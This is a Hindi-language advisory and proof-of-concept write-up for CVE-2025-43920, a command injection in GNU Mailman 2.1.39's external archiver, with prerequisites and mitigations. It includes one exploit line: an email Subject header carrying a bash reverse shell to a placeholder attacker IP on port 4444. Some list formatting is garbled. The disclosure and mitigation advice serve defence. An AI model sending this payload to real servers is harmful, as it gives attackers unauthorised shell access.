
CVE-2025-43920 के लिए PoC और तकनीकी राइट-अप, GNU Mailman 2.1.39 के बाहरी आर्काइवर में रिमोट कमांड इंजेक्शन जो क्राफ्टेड ईमेल विषयों के माध्यम से बिना प्रमाणीकरण के कोड निष्पादन की अनुमति देता है।
खोजकर्ता: फिरुदिन दावुदज़ादा और मुसाजादा अयदान
प्रकटीकरण तिथि: अप्रैल 2025
CVE ID: CVE-2025-43920
गंभीरता: 5.4 मध्यम (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)
हमले का प्रकार: दूरस्थ
प्रभावित सॉफ्टवेयर: GNU Mailman 2.1.39 (cPanel/WHM के साथ बंडल)
GNU Mailman 2.1.39, जो cPanel और WHM के साथ बंडल किया गया है, एक गंभीर कमांड इंजेक्शन दोष के प्रति संवेदनशील है जो अप्रमाणित हमलावरों को मनमानी ऑपरेटिंग सिस्टम कमांड निष्पादित करने की अनुमति देता है। यह भेद्यता तब उत्पन्न होती है जब mm_cfg.py कॉन्फ़िगरेशन फ़ाइल में PUBLIC_EXTERNAL_ARCHIVER या PRIVATE_EXTERNAL_ARCHIVER का उपयोग करके एक बाहरी संग्रहकर्ता कॉन्फ़िगर किया जाता है, और ईमेल विषय पंक्ति में शेल मेटाकैरेक्टर होते हैं जो ठीक से स्वच्छ नहीं किए जाते हैं। इससे पूर्ण सिस्टम से समझौता हो सकता है, जिससे हमलावर रिवर्स शेल स्थापित कर सकते हैं, डेटा चुरा सकते हैं, या अन्य दुर्भावनापूर्ण कार्य कर सकते हैं।
PUBLIC_EXTERNAL_ARCHIVER, PRIVATE_EXTERNAL_ARCHIVER)Mailman/Handlers/ (ईमेल विषय प्रसंस्करण तर्क, संभवतः CookHeaders.py जैसी फ़ाइलें शामिल हैं);, &, |) मौजूद होने पर मनमानी कमांड निष्पादित की जा सकती है।इस भेद्यता का शोषण करने के लिए, एक हमलावर Mailman-प्रबंधित सूची में एक दुर्भावनापूर्ण विषय पंक्ति के साथ एक ईमेल भेज सकता है, जैसे:
Subject: ;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
पूर्वापेक्षाएँ:
PUBLIC_EXTERNAL_ARCHIVER या PRIVATE_EXTERNAL_ARCHIVER के माध्यम से कॉन्फ़िगर किया गया एक बाहरी संग्रहकर्ता होना चाहिए।ATTACKERIP:4444 पर एक लिसनर (जैसे, netcat) स्थापित किया जाना चाहिए।अपेक्षित परिणाम: यदि बाहरी संग्रहकर्ता कमांड विषय पंक्ति को स्वच्छ नहीं करता है, तो दुर्भावनापूर्ण कमांड सर्वर पर निष्पादित होता है, हमलावर के सर्वर पर एक रिवर्स शेल स्थापित करता है।
बाहरी संग्रहकर्ता अक्षम करें: बाहरी संग्रहकर्ता कार्यक्षमता को अक्षम करने के लिए mm_cfg.py में PUBLIC_EXTERNAL_ARCHIVER और PRIVATE_EXTERNAL_ARCHIVER को None पर सेट करें:
PUBLIC_EXTERNAL_ARCHIVER = None
PRIVATE_EXTERNAL_ARCHIVER = None
इनपुट स्वच्छ करें: यदि बाहरी संग्रहकर्ता की आवश्यकता है, तो सुनिश्चित करें कि कमांड शेल मेटाकैरेक्टर इंजेक्शन को रोकने के लिए विषय पंक्ति को स्वच्छ करता है।
सदस्यता प्रतिबंधित करें: जोखिम कम करने के लिए मेलिंग सूची सदस्यता को विश्वसनीय उपयोगकर्ताओं तक सीमित करें।
फिरुदिन दावुदज़ादा और मुसाजादा अयदान ने एक स्वीकृत पैठ परीक्षण अभियान के दौरान जिम्मेदारी से इस भेद्यता का खुलासा किया। समन्वय के लिए MITRE CVE टीम का धन्यवाद।
ईमेल: [email protected]\